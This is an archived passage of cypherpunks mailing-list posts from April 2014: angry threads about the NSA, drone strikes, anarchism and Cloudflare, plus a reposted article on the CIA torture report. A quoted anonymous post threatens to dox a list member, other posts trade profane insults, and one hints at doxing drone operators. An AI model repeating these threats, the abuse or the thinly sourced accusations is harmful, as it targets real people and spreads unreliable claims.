covert compromise and corruption [was: Geoff Stone, Obama's Review Group] In-Reply-To: References: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9> <5341BE6A.6060105@cypherpunks.to> Message-ID: <1396827166.14348.103428341.4066134F@webmail.messagingengine.com> On Sun, Apr 6, 2014, at 03:37 PM, Scott Blaydes wrote: > New NWA (Nerds With Access) song “Fuck the Police^H^H^H^H^H^H NSA” > available soon on a torrent site near you. I'm totally in! Can provide synth and tape loops, while wearing EFF stickers on my boobs. > > On Apr 6, 2014, at 3:51 PM, gwen hastings <> wrote: > > > FUCK THE NSA!! > > > > asshat motherfuckers! > > > > warmly > > gwen > > > > On 4/6/14 1:31 PM, Juan Garofalo wrote: > >> > >> > >> --On Saturday, April 05, 2014 8:52 PM -0700 coderman <> > >> wrote: > >> > >> > >>> > >>>> It gradually became apparent to me that in the months after > >>>> Edward Snowden began releasing information about the government's > >>>> foreign intelligence surveillance activities, the NSA was being > >>>> severely -- and unfairly -- demonized by its critics. > >>> > >>> conflating NSA as an institutional entity, NSA tasking, and NSA staff. > >>> > >>> NSA tasking is bad and should feel bad. > >>> > >>> NSA institutional culture is less bad, yet needs correction. > >>> > >>> NSA employees individually? they have been deceived and demoralized > >>> themselves! this group is the least culpable, in my eyes. > >> > >> > >> Are you joking? The 'NSA institutional entity' IS NOTHING BUT THE > >> COLLECTION OF NSA EMPLOYEES. > >> > >> Ah, yes, this team of murderers is bad 'as a team', but when you look at > >> each individual murderer, individually they are > >> anarcho-libertarian-pacifists who live in a monastery in tibet. > >> > >> Please. > >> > >> > >> > > > > > > -- > > Tentacle #99 > > > > ecc public key curve p25519(pcp 0.15) > > > > 1l0$WoM5C8z=yeZG7?$]f^Uu8.g>4rf#t^6mfW9(rr910 > > > > Governments are instituted among men, > > deriving their just powers from the consent of the governed, > > that whenever any form of government becomes destructive > > of these ends, it is the right of the people to alter or > > abolish it, and to institute new government, laying its > > foundation on such principles, and organizing its powers > > in such form, as to them shall seem most likely to effect > > their safety and happiness.’ > > > > to get pcp(curve25519 cli) > > (curve 25519 python based cli) > > <0x42AA24D5.asc> > > Email had 1 attachment: > + signature.asc > 1k (application/pgp-signature) From tpb-crypto at laposte.net Sun Apr 6 07:40:55 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Sun, 06 Apr 2014 16:40:55 +0200 Subject: [cryptography] Github Pages now supports SSL In-Reply-To: References: Message-ID: <2032043828.224611.1396795238185.JavaMail.www@wwinf8228> > Message du 04/04/14 20:09 > De : "Eric Mill" > Along with Cloudflare's 2014 plan to offer SSL termination for free, and > their stated plan to double SSL on the Internet by end of year, the barrier > to HTTPS everywhere is dropping rapidly. > I agree that putting https everywhere is great, but Cloudflare's founders are tightly linked with the US-intelligence community. That fact alone kind of kills any claims they make about data security within their service. From tpb-crypto at laposte.net Sun Apr 6 07:43:46 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Sun, 06 Apr 2014 16:43:46 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> <966007728.44996.1396564331597.JavaMail.www@wwinf8313> <9857014.dptqhKsx4l@lap> <2061449686.115376.1396620102841.JavaMail.www@wwinf8223> <1819357077.122066.1396626224143.JavaMail.www@wwinf8223> Message-ID: <272995784.224718.1396795409402.JavaMail.www@wwinf8228> > Message du 04/04/14 19:57 > De : "Cari Machet" > > > i would never feel an inbox and am wholly against 'feeling inboxes' not > down at all for that ever > > meow kitty kitty (is my insenuation made clear?) > Maybe, one day typing correctors will work better, as of now you should be aware of this fact since you are so smart. From tpb-crypto at laposte.net Sun Apr 6 08:00:02 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Sun, 06 Apr 2014 17:00:02 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <533EF242.5010604@loom.cc> <20140405024449.EF1112280DB@palinka.tinho.net> Message-ID: <694807031.225350.1396796385327.JavaMail.www@wwinf8228> > Message du 05/04/14 12:19 > De : "Cari Machet" > slime likes to group together and create cavities in peoples minds > deep > holes > > none of you apparently have the capacity to actually make any arguments > against what i write therefor have to resort to sick tactics like school > children mentality how the fuck old are you supposed men? > How about you stop stamping your little feet to the ground while screaming "capitalists" once in a while? From tpb-crypto at laposte.net Sun Apr 6 08:02:41 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Sun, 06 Apr 2014 17:02:41 +0200 Subject: reminder of mays manifesto In-Reply-To: References: Message-ID: <484396473.225471.1396796544364.JavaMail.www@wwinf8228> > Message du 05/04/14 14:35 > De : "Cari Machet" > i post this here as a reminder of anarchist models and how they can be > utilized in fascist occasions and are anti facsist but also are anti > capitalist - anarchist models are found in every sector that i know of [...] How about an anarchist model that is against socialism/communism/cultural-marxism/political-correctness/big-brother once in a while for a change? From tedks at riseup.net Sun Apr 6 14:19:21 2014 From: tedks at riseup.net (Ted Smith) Date: Sun, 06 Apr 2014 17:19:21 -0400 Subject: reminder of mays manifesto In-Reply-To: <484396473.225471.1396796544364.JavaMail.www@wwinf8228> References: <484396473.225471.1396796544364.JavaMail.www@wwinf8228> Message-ID: <1396819161.25668.17.camel@anglachel> On Sun, 2014-04-06 at 17:02 +0200, tpb-crypto at laposte.net wrote: > > Message du 05/04/14 14:35 > > De : "Cari Machet" > > i post this here as a reminder of anarchist models and how they can be > > utilized in fascist occasions and are anti facsist but also are anti > > capitalist - anarchist models are found in every sector that i know of [...] > > How about an anarchist model that is against > socialism/communism/cultural-marxism/political-correctness/big-brother > once in a while for a change? There's no such thing as anarchism against socialism. Anarchism is a socialist/communist ideology; conceiving of non-socialist anarchism is like conceiving of atheist christianity -- it just doesn't make sense. There's some postmodernist "post-left" anarchism, but even that is still anti-capitalist and frankly communist, they're just less aligned with the historical trends of communism. If this is surprising, I suggest reading the Anarchist FAQ: http://anarchism.pageabode.com/afaq/index.html -- Sent from Ubuntu -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: This is a digitally signed message part URL: From juan.g71 at gmail.com Sun Apr 6 13:31:24 2014 From: juan.g71 at gmail.com (Juan Garofalo) Date: Sun, 06 Apr 2014 17:31:24 -0300 Subject: fuck ALL obscene systems of covert compromise and corruption [was: Geoff Stone, Obama's Review Group] In-Reply-To: References: Message-ID: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9> --On Saturday, April 05, 2014 8:52 PM -0700 coderman wrote: > >> It gradually became apparent to me that in the months after >> Edward Snowden began releasing information about the government's >> foreign intelligence surveillance activities, the NSA was being >> severely -- and unfairly -- demonized by its critics. > > conflating NSA as an institutional entity, NSA tasking, and NSA staff. > > NSA tasking is bad and should feel bad. > > NSA institutional culture is less bad, yet needs correction. > > NSA employees individually? they have been deceived and demoralized > themselves! this group is the least culpable, in my eyes. Are you joking? The 'NSA institutional entity' IS NOTHING BUT THE COLLECTION OF NSA EMPLOYEES. Ah, yes, this team of murderers is bad 'as a team', but when you look at each individual murderer, individually they are anarcho-libertarian-pacifists who live in a monastery in tibet. Please. From scott at sbce.org Sun Apr 6 15:37:44 2014 From: scott at sbce.org (Scott Blaydes) Date: Sun, 6 Apr 2014 17:37:44 -0500 Subject: FUCK THE FUCKING NSA AND THE APOLOGISTS FOR SAME FUCK YOU!!!Re: fuck ALL obscene systems of covert compromise and corruption [was: Geoff Stone, Obama's Review Group] In-Reply-To: <5341BE6A.6060105@cypherpunks.to> References: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9> <5341BE6A.6060105@cypherpunks.to> Message-ID: New NWA (Nerds With Access) song “Fuck the Police^H^H^H^H^H^H NSA” available soon on a torrent site near you. On Apr 6, 2014, at 3:51 PM, gwen hastings wrote: > FUCK THE NSA!! > > asshat motherfuckers! > > warmly > gwen > > On 4/6/14 1:31 PM, Juan Garofalo wrote: >> >> >> --On Saturday, April 05, 2014 8:52 PM -0700 coderman >> wrote: >> >> >>> >>>> It gradually became apparent to me that in the months after >>>> Edward Snowden began releasing information about the government's >>>> foreign intelligence surveillance activities, the NSA was being >>>> severely -- and unfairly -- demonized by its critics. >>> >>> conflating NSA as an institutional entity, NSA tasking, and NSA staff. >>> >>> NSA tasking is bad and should feel bad. >>> >>> NSA institutional culture is less bad, yet needs correction. >>> >>> NSA employees individually? they have been deceived and demoralized >>> themselves! this group is the least culpable, in my eyes. >> >> >> Are you joking? The 'NSA institutional entity' IS NOTHING BUT THE >> COLLECTION OF NSA EMPLOYEES. >> >> Ah, yes, this team of murderers is bad 'as a team', but when you look at >> each individual murderer, individually they are >> anarcho-libertarian-pacifists who live in a monastery in tibet. >> >> Please. >> >> >> > > > -- > Tentacle #99 > > ecc public key curve p25519(pcp 0.15) > > 1l0$WoM5C8z=yeZG7?$]f^Uu8.g>4rf#t^6mfW9(rr910 > > Governments are instituted among men, > deriving their just powers from the consent of the governed, > that whenever any form of government becomes destructive > of these ends, it is the right of the people to alter or > abolish it, and to institute new government, laying its > foundation on such principles, and organizing its powers > in such form, as to them shall seem most likely to effect > their safety and happiness.’ > > https://github.com/TLINDEN/pcp.git to get pcp(curve25519 cli) > https://github.com/stef/pbp.git (curve 25519 python based cli) > <0x42AA24D5.asc> -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 842 bytes Desc: Message signed with OpenPGP using GPGMail URL: From carimachet at gmail.com Sun Apr 6 13:11:42 2014 From: carimachet at gmail.com (Cari Machet) Date: Sun, 6 Apr 2014 20:11:42 +0000 Subject: reminder of mays manifesto In-Reply-To: <484396473.225471.1396796544364.JavaMail.www@wwinf8228> References: <484396473.225471.1396796544364.JavaMail.www@wwinf8228> Message-ID: On Sun, Apr 6, 2014 at 3:02 PM, wrote: > > Message du 05/04/14 14:35 > > De : "Cari Machet" > > i post this here as a reminder of anarchist models and how they can be > > utilized in fascist occasions and are anti facsist but also are anti > > capitalist - anarchist models are found in every sector that i know of > [...] > > How about an anarchist model that is against > socialism/communism/cultural-marxism/political-correctness/big-brother once > in a while for a change? > i am against those things and a lot of anarchists dont align with socialism or marxism i am often fighting with my friends that are marxist or trotskyists - i hate political correctness and also feminism its all bullshit and brings no solution - what people often dont understand about the difference btwn anarchy and socialism is that anarchists want no rule - they dont want to be ruled by anything or anyone and deal with things in a horizontal mode or horizontal decision making - socialism is state and centralized autocracy - totally different animal -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2305 bytes Desc: not available URL: From coderman at gmail.com Sun Apr 6 20:30:02 2014 From: coderman at gmail.com (coderman) Date: Sun, 6 Apr 2014 20:30:02 -0700 Subject: fuck ALL obscene systems of covert compromise and corruption [was: Geoff Stone, Obama's Review Group] In-Reply-To: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9> References: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9> Message-ID: On Sun, Apr 6, 2014 at 1:31 PM, Juan Garofalo wrote: > ... > Are you joking? The 'NSA institutional entity' IS NOTHING BUT THE > COLLECTION OF NSA EMPLOYEES. the evidence points otherwise. you can see the compartmentalization at work in the leaks, in the way the technology is structured, in the constraints that some systems exhibit while others do not. this is an interesting reverse engineering exercise, you should try it :) > Ah, yes, this team of murderers is bad 'as a team', but when you look at > each individual murderer, individually they are > anarcho-libertarian-pacifists who live in a monastery in tibet. i like some of their old work protecting things, rather than breaking them. (are you really equating writing automated fuzzers with targeted murder by sniper fire? (drone snipers count)) From coderman at gmail.com Sun Apr 6 20:33:46 2014 From: coderman at gmail.com (coderman) Date: Sun, 6 Apr 2014 20:33:46 -0700 Subject: intelligence community leadership: patriarchal dicks Message-ID: "if the intelligence community thinks that the controversy over our legacy of torture is just the result of some silly girlish feelings, then we haven't even begun to deal with the consequences of those years." --- http://www.newyorker.com/online/blogs/closeread/2014/04/dianne-feinstein-emotions-and-the-cia.html Who's "Emotional"-- Feinstein or the C.I.A.? Who gets "emotional" about torture--or, rather, what is the proper emotional response to a history of torture and lies? On Fox News, on Sunday morning, Chris Wallace asked Michael Hayden, the former director of the C.I.A., about a report by the Senate Select Committee on Intelligence, sixty-three hundred pages long, that "says the C.I.A. misled the public about the severity and the success of the enhanced interrogation program." Hayden's first response was to talk about the feelings of Dianne Feinstein, the chair of the committee, citing an article by David Ignatius: "He said Senator Feinstein wanted a report so scathing that it would 'ensure that an un-American brutal program of detention and interrogation would never again be considered or permitted.' " Now, that sentence, that motivation for the report, Chris, may show deep emotional feeling on part of the senator. But I don't think it leads you to an objective report. "Deep emotional feelings," on the part of a woman like Feinstein, are apparently dizzying, especially when it comes to things like our integrity as a nation. But are Hayden and his former colleagues at the C.I.A., in touch with their own emotions on this one? The Senate voted on Thursday to submit the report for declassification; this process may take a while, because the White House and the C.I.A. will be involved, and the agency has fought the report. It has made its objections known feelingly, in a rebuttal that is also classified, in testimony, and in leaks to reporters about how the Senate just doesn't understand what it was like--doesn't get it, doesn't care about what bad days its agents had. Not that the C.I.A. wants to tell. When John Brennan, the current head of the C.I.A., realized that the Senate investigators had some of the agency's notes to itself--the so-called Panetta papers, in which, according to Senator Feinstein, the agency conceded points it is now denying--he had a bit of a fit. Feinstein said that the committee got the Panetta papers from the C.I.A. in a document dump; the agency said that even if it did, the committee ought to have known that those notes were private. It apparently searched the Senate's computers and tried to get a criminal investigation started. Calling the cops is, admittedly, a common fantasy when an teen-ager realizes that his journal has been read, but it's a bit unworthy of an intelligence agency when dealing with its congressional overseers. Now, not that there's anything wrong with wanting a scathing report in torture that will shock the conscience, but it's probably worth noting that the Ignatius line Hayden cited took a Feinstein quote slightly out of context. (Though the layering of emotionalism is on Hayden.) Ignatius wrote that Feinstein "wanted a report so tough that it would 'ensure that an un-American, brutal program of detention and interrogation will never again be considered or permitted,' as she put it." She had actually presented this as the reason to make the report public: If the Senate can declassify this report, we will be able to ensure that an un-American, brutal program of detention and interrogation will never again be considered or permitted. Emphasis added. It's a fine distinction, but an important one: whatever her "motivation" was, it didn't shape the writing of the report, but her feelings about who ought to get to read it. (On Saturday, Trevor Timm, of the Press Freedom Foundation, put out a "general plea" for a leak.) There are really two issues here. One is the reflexive tendency to disparage or dismiss a woman in politics (or in business, or anywhere) with a remark about her supposed susceptibility to emotion. The other is the way a certain femininity--the wilting kind--is ascribed to those who doubt that torture is good for America. The cartoon is of the clear-headed torturer who has put tenderness aside for the sake of country, against the squeamish, sensitive, can't-handle-the-truth doubters. The supposed contrast is between focussed, rational realism and a tendency to faint. (Men and women can be put in either role, as in "Zero Dark Thirty.") But fear and a desire to punish, which disabled the judgments of many in the government after 9/11, are emotions, too, and even harder to control than, say, mercy. So is a fascination with one's own power to protect or, less charitably, one's self-imagined ruthlessness. So is a tendency to be charmed by dark sides. One can argue that those who turn to the law or a moral code, in moments of crisis, can be the least flushed by feeling. That is not to make a case against inserting feeling into politics: righteous indignation and kindness can anchor, rather than discombobulate. It might be most accurate to say that various emotions serve us differently. They wake us up, and, when they do, in what can be an outraged, bleary-eyed moment, we should be careful about what we reach for. And if the intelligence community thinks that the controversy over our legacy of torture is just the result of some silly girlish feelings, then we haven't even begun to deal with the consequences of those years. There is another powerful emotion that may be at work here: shame. One source of C.I.A.'s anxiety about the Senate report is that it apparently casts a cold eye on the effectiveness of torture. It didn't do us much good, apparently. Perhaps it is painful to have compromised one's principles and not brought back anything good. But that psychological exploration should not take place entirely in classified quarters. About the same time that Hayden was on Fox News, Nancy Pelosi was on CNN, talking to Candy Crowley about the same report. Crowley asked if she blamed senior C.I.A. officials for the "misrepresentations" about torture; Pelosi went a level higher, to make a point about institutional culture, and one of our more fundamental emotions--the desire for praise. "Many people in the C.I.A. are so patriotic, they--they protect our country in a way to avoid conflict and--and, uh, violence, etc. But the attitude that was there was very--I think, it came from Dick Cheney. That's what I believe," she said. Did Cheney's shamelessness represented an absence of emotion? Not really. "I think he's proud of it," Pelosi said. "I think he's proud of it. I think he's proud of it." From coderman at gmail.com Sun Apr 6 20:58:26 2014 From: coderman at gmail.com (coderman) Date: Sun, 6 Apr 2014 20:58:26 -0700 Subject: active beam steering to camouflage transmission [was: How safe is smartphones today?] Message-ID: On Sun, Apr 6, 2014 at 12:14 PM, grarpamp wrote: >... > Agreed near-unlimited-width SDR has fun potential, and for cpunks > some equally hard to identify/jam/locate encrypted comms that don't > interfere with traditional narrow comms. past experiments with direction finding gear has shown it very dependent on key assumptions. use of beam steering to thwart direction finding and triangulation a world of fun. relevant references solicited! From coderman at gmail.com Sun Apr 6 21:01:54 2014 From: coderman at gmail.com (coderman) Date: Sun, 6 Apr 2014 21:01:54 -0700 Subject: [tor-talk] How safe is smartphones today? In-Reply-To: <20140406221449.GT18407@hexapodia.org> References: <533C96AF.2050004@anonymous.coward.posteo.de> <20140403013535.GA9002@torproject.org> <533D33AD.3040509@sent.at> <20140406221449.GT18407@hexapodia.org> Message-ID: On Sun, Apr 6, 2014 at 3:14 PM, Andy Isaacson wrote: > ... there are blob-free WiFi cards available: > https://www.fsf.org/resources/hw/endorsement/thinkpenguin i have intended to go over the ath9k-htc sources, thanks for bringing this up! of all the wifi chipsets, i do like the atheros lines the best... especially with virtual station/ap/device support! From tpb-crypto at laposte.net Sun Apr 6 12:20:55 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Sun, 06 Apr 2014 21:20:55 +0200 Subject: [cryptography] Github Pages now supports SSL In-Reply-To: <53417456.2060405@staticsafe.ca> References: <2032043828.224611.1396795238185.JavaMail.www@wwinf8228> <53417456.2060405@staticsafe.ca> Message-ID: <450704774.433340.1396812055146.JavaMail.www@wwinf8222> > Message du 06/04/14 17:41 > De : "staticsafe" > On 4/6/2014 10:40, tpb-crypto at laposte.net wrote: > >> Message du 04/04/14 20:09 > >> De : "Eric Mill" > >> Along with Cloudflare's 2014 plan to offer SSL termination for free, and > >> their stated plan to double SSL on the Internet by end of year, the barrier > >> to HTTPS everywhere is dropping rapidly. > >> > > > > I agree that putting https everywhere is great, but Cloudflare's founders are tightly linked with the US-intelligence community. That fact alone kind of kills any claims they make about data security within their service. > > Source for this please? > Is it so painful to do your own homework? "Matthew Prince, Lee Holloway, and Michelle Zatlyn created CloudFlare in 2009.[1][2] They previously worked on Project Honey Pot." - http://en.wikipedia.org/wiki/CloudFlare "[...] the project organizers also help various law enforcement agencies combat private and commercial unsolicited bulk mailing offenses and overall work to help reduce the amount of spam being sent [...]" - http://en.wikipedia.org/wiki/Project_Honey_Pot That's just for starters, you can dig more and find more. It is interesting that the history of the founders themselves is no longer exhibited in cloudflare.com website as it was years ago. As an American company, there is nothing preventing Cloudflare from receiving NSLs and having to shut up about them. What use is a system that you can't trust like this? You can say "oh, but they go after the bad guys, spammers". But that doesn't limit it to spammers neither do we know who are the so called bad guys, since that is decided by American secret laws, made by secret courts, that issue secret orders. No trust to American companies, less even trust to American companies that promise any kind of data security. Better no security than a false sense of it. Sorry. From carimachet at gmail.com Sun Apr 6 15:01:37 2014 From: carimachet at gmail.com (Cari Machet) Date: Sun, 6 Apr 2014 22:01:37 +0000 Subject: reminder of mays manifesto In-Reply-To: <1396819161.25668.17.camel@anglachel> References: <484396473.225471.1396796544364.JavaMail.www@wwinf8228> <1396819161.25668.17.camel@anglachel> Message-ID: proudon who was the first to call himself an anarchist in like 1850 was not aligned with marx - they knew one another but... he was not a socialist and certainly not a marxist he worked on mutualism which is structurally incredibly different and majorly egalitarian (no state rule whatsoever autocratic or otherwise) i dont think in a dualist manner either communism or capitalism there are different ways proudon dealt a lot with the issue of property which is an incredibly difficult issue to deal with and some say if the french during the revolution would have dealt solidly with the issue of property (a giant problem because of the elite) there would have been a much more transformed world after and a 'real' revolution he had some things in common with diderot as he dealt with intellectual property a lot - educating the masses... information flow for the people i will read your link of course - thanks On Sun, Apr 6, 2014 at 9:19 PM, Ted Smith wrote: > On Sun, 2014-04-06 at 17:02 +0200, tpb-crypto at laposte.net wrote: > > > Message du 05/04/14 14:35 > > > De : "Cari Machet" > > > i post this here as a reminder of anarchist models and how they can be > > > utilized in fascist occasions and are anti facsist but also are anti > > > capitalist - anarchist models are found in every sector that i know of > [...] > > > > How about an anarchist model that is against > > socialism/communism/cultural-marxism/political-correctness/big-brother > > once in a while for a change? > > There's no such thing as anarchism against socialism. Anarchism is a > socialist/communist ideology; conceiving of non-socialist anarchism is > like conceiving of atheist christianity -- it just doesn't make sense. > There's some postmodernist "post-left" anarchism, but even that is still > anti-capitalist and frankly communist, they're just less aligned with > the historical trends of communism. > > If this is surprising, I suggest reading the Anarchist FAQ: > http://anarchism.pageabode.com/afaq/index.html > > -- > Sent from Ubuntu > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3652 bytes Desc: not available URL: From coderman at gmail.com Sun Apr 6 22:59:52 2014 From: coderman at gmail.com (coderman) Date: Sun, 6 Apr 2014 22:59:52 -0700 Subject: hello my fellow future bug splats Message-ID: the incidence of civilian casualties during drone strikes implies that they're intentionally focused on larger degree social congregations rather than laser specific solitary strikes. presumably this ensures that not just a target, but target collaborators are also consumed in a strike. ... except when the strikes are mis-targeted, and the amplified social circle pulls in women and children. yet still no blacklash? why do drone strikes continue? what the fuck? http://notabugsplat.com/ From scott at sbce.org Mon Apr 7 01:13:53 2014 From: scott at sbce.org (Scott Blaydes) Date: Mon, 7 Apr 2014 03:13:53 -0500 Subject: hello my fellow future bug splats In-Reply-To: References: Message-ID: On Apr 7, 2014, at 12:59 AM, coderman wrote: > the incidence of civilian casualties during drone strikes implies that > they're intentionally focused on larger degree social congregations > rather than laser specific solitary strikes. > > presumably this ensures that not just a target, but target > collaborators are also consumed in a strike. > > ... except when the strikes are mis-targeted, and the amplified social > circle pulls in women and children. > > > yet still no blacklash? why do drone strikes continue? what the fuck? > > http://notabugsplat.com/ Isn’t it obvious? We have failed as a mammal. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 842 bytes Desc: Message signed with OpenPGP using GPGMail URL: From grarpamp at gmail.com Mon Apr 7 02:16:27 2014 From: grarpamp at gmail.com (grarpamp) Date: Mon, 7 Apr 2014 05:16:27 -0400 Subject: active beam steering to camouflage transmission [was: How safe is smartphones today?] In-Reply-To: References: Message-ID: > direction finding I don't believe classical methods apply here. > relevant references solicited! Soon as I find the paper/citation again. From grarpamp at gmail.com Mon Apr 7 03:29:57 2014 From: grarpamp at gmail.com (grarpamp) Date: Mon, 7 Apr 2014 06:29:57 -0400 Subject: hello my fellow future bug splats In-Reply-To: References: Message-ID: On Mon, Apr 7, 2014 at 1:59 AM, coderman wrote: > rather than laser specific solitary strikes. A wise goat knows not to leave the herd. And it's pretty hard to kill just one ant in an anthill. > presumably this ensures that not just a target, but target > collaborators are also consumed in a strike. That's the 'fuck it, kill em all' concept, certainly approved at the highest levels of certain govt's. > circle pulls in women Careful, women earn stays in reformatories, guilt avoids no gender. > yet still no blacklash? why do drone strikes continue? what the fuck? Because no one inside or outside the US seems willing to haul its ass into the Hague (or other appropriate venue) on charges to resolve the whole extrajudicial, torture, killing, spying, rendition, global non-war war, econ/etc meddling thing, et al. You'd think an accusation of murder would be a guaranteed ticket to at least a grand jury. Yet as months and years tick by those who could do such hauling keep washing it all under a veil of disjointed weak rhetoric till they forget. Why this is... maybe we can't grasp. But the depths to which it could slide are pretty scary, both globally and in everyone's locale. > http://notabugsplat.com/ This is worthy though :) These and others affected are the ones who will never forget... From jya at pipeline.com Mon Apr 7 04:18:47 2014 From: jya at pipeline.com (John Young) Date: Mon, 07 Apr 2014 07:18:47 -0400 Subject: hello my fellow future bug splats In-Reply-To: References: Message-ID: Still, despite the slight irritation about drone killings, there have been, AFAIK, no protests at the CIA HQ gates against the agency's drone pilots, sensors and weapons launchers located at temporary huts at both sides of spies' pig sty dining hall. Nor at the drone pilots, sensors and weapons launchers training base at Indian Wells AFB, Nevada. Nor at the homes of spy and mil drone operators, sensors and weapons launchers. (Apparently none have yet been doxed although DoD droners have been named in news reports and DoD PR media when medals are awarded.) Nor at the contractors who build and staff drones, training and deployment. Nor at the homes of the USG three-branch members who support the drone murders. Nor at the several universities where students are trained to operate drones in expectation of well-paying jobs in a booming (no pun) industry. DoD recruits by touting the swell future for droners trained by DoD for later civilian employment. As well as touting the role of drone contractors (CIA does too but more discreetly). Nor any sabotage of drone systems. Oops, that criminal, don't do it. So it is not clear what opponents of drone kilings are willing to do beyond risk-free bitching, strutting, mail bombing and petitioning. All of which is a good start but not likely to have much effect until opposition is well beyond verbal puking. Does this remind of the way crypto is handled by deft verbal puking about the industry while quietly working within it, hoping the pukers will continue helping draw attention to the need for a duplicitious practice to combat enemies of the industry. From dan at geer.org Mon Apr 7 05:36:53 2014 From: dan at geer.org (dan at geer.org) Date: Mon, 07 Apr 2014 08:36:53 -0400 Subject: hello my fellow future bug splats In-Reply-To: Your message of "Mon, 07 Apr 2014 06:29:57 EDT." Message-ID: <20140407123653.DDACD2280C7@palinka.tinho.net> > A wise goat knows not to leave the herd. And > it's pretty hard to kill just one ant in an anthill. As you say, human shields are effective in proportion to the self-restraint of the opponent, and nothing more. --dan From shelley at misanthropia.info Mon Apr 7 08:46:33 2014 From: shelley at misanthropia.info (shelley at misanthropia.info) Date: Mon, 07 Apr 2014 08:46:33 -0700 Subject: FAKE Indian TROLL ALERT!!(cari machet warning!) In-Reply-To: <005d01cf5258$56682820$03387860$@net> References: <825a4a4accfe4fac4d5a6b3aced63a8a@remailer.privacy.at> <005d01cf5258$56682820$03387860$@net> Message-ID: <1396885593.6200.103689113.66D41118@webmail.messagingengine.com> On Mon, Apr 7, 2014, at 04:55 AM, Silent1 wrote: >a fantasist sat at their computer in stained white pants jacking off to my little pony and reading full-disclosure for erotica Um, hey... keep your drones out of my damn windows! > Don't you think that endlessly posting every time Cari does that that's > trolling as well, it's tiresome, if you have something to say then say it > but for gods sake drop the bloody pretend Indian thing, people either > know > and don't care or don't know and wouldn't care anyway, Christ for all > anyone > knows everyone else on here is a fantasist sat at their computer in > stained > white pants jacking off to my little pony and reading full-disclosure for > erotica, so does it really matter? > > -----Original Message----- > From: cypherpunks [mailto:] On Behalf Of > Anonymous Remailer (austria) > Sent: Saturday, April 05, 2014 2:47 PM > To: > Subject: FAKE Indian TROLL ALERT!!(cari machet warning!) > > > > On Apr 5, 2014, at 3:26 AM, Cari Machet <> wrote: > > > capitalist > > AND You BITCH are a thieving Looter > > Time to DOX you and turn over all to the passport authorities/NSA!! > > > > FUCK you Cari Machet - fake indian > From alfiej at fastmail.fm Sun Apr 6 17:12:58 2014 From: alfiej at fastmail.fm (Alfie John) Date: Mon, 07 Apr 2014 10:12:58 +1000 Subject: FUCK THE FUCKING NSA AND THE APOLOGISTS FOR SAME FUCK YOU!!!Re: fuck ALL obscene systems of covert compromise and corruption [was: Geoff Stone, Obama's Review Group] In-Reply-To: <1396827166.14348.103428341.4066134F@webmail.messagingengine.com> References: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9> <5341BE6A.6060105@cypherpunks.to> <1396827166.14348.103428341.4066134F@webmail.messagingengine.com> Message-ID: <1396829578.32166.103436853.05B61194@webmail.messagingengine.com> On Mon, Apr 7, 2014, at 09:32 AM, shelley at misanthropia.info wrote: > On Sun, Apr 6, 2014, at 03:37 PM, Scott Blaydes wrote: > > New NWA (Nerds With Access) song “Fuck the Police^H^H^H^H^H^H NSA” > > available soon on a torrent site near you. > > I'm totally in! Can provide synth and tape loops, while wearing EFF > stickers on my boobs. It would be cool if The Juice Media did this. Here is some of their previous work: http://thejuicemedia.com/season-1/ Alfie -- Alfie John alfiej at fastmail.fm From rysiek at hackerspace.pl Mon Apr 7 02:23:40 2014 From: rysiek at hackerspace.pl (rysiek) Date: Mon, 07 Apr 2014 11:23:40 +0200 Subject: hello my fellow future bug splats In-Reply-To: References: Message-ID: <1468399.FtXkr1fcDS@lap> Dnia niedziela, 6 kwietnia 2014 22:59:52 coderman pisze: > the incidence of civilian casualties during drone strikes implies that > they're intentionally focused on larger degree social congregations > rather than laser specific solitary strikes. > > presumably this ensures that not just a target, but target > collaborators are also consumed in a strike. > > ... except when the strikes are mis-targeted, and the amplified social > circle pulls in women and children. > > > yet still no blacklash? why do drone strikes continue? what the fuck? > > http://notabugsplat.com/ While I applaud the initiative, I believe we need a stronger message. Stop calling them "drone operators", start calling them "cowardly murderers". -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From lists at silent1.net Mon Apr 7 04:55:56 2014 From: lists at silent1.net (Silent1) Date: Mon, 7 Apr 2014 12:55:56 +0100 Subject: FAKE Indian TROLL ALERT!!(cari machet warning!) In-Reply-To: <825a4a4accfe4fac4d5a6b3aced63a8a@remailer.privacy.at> References: 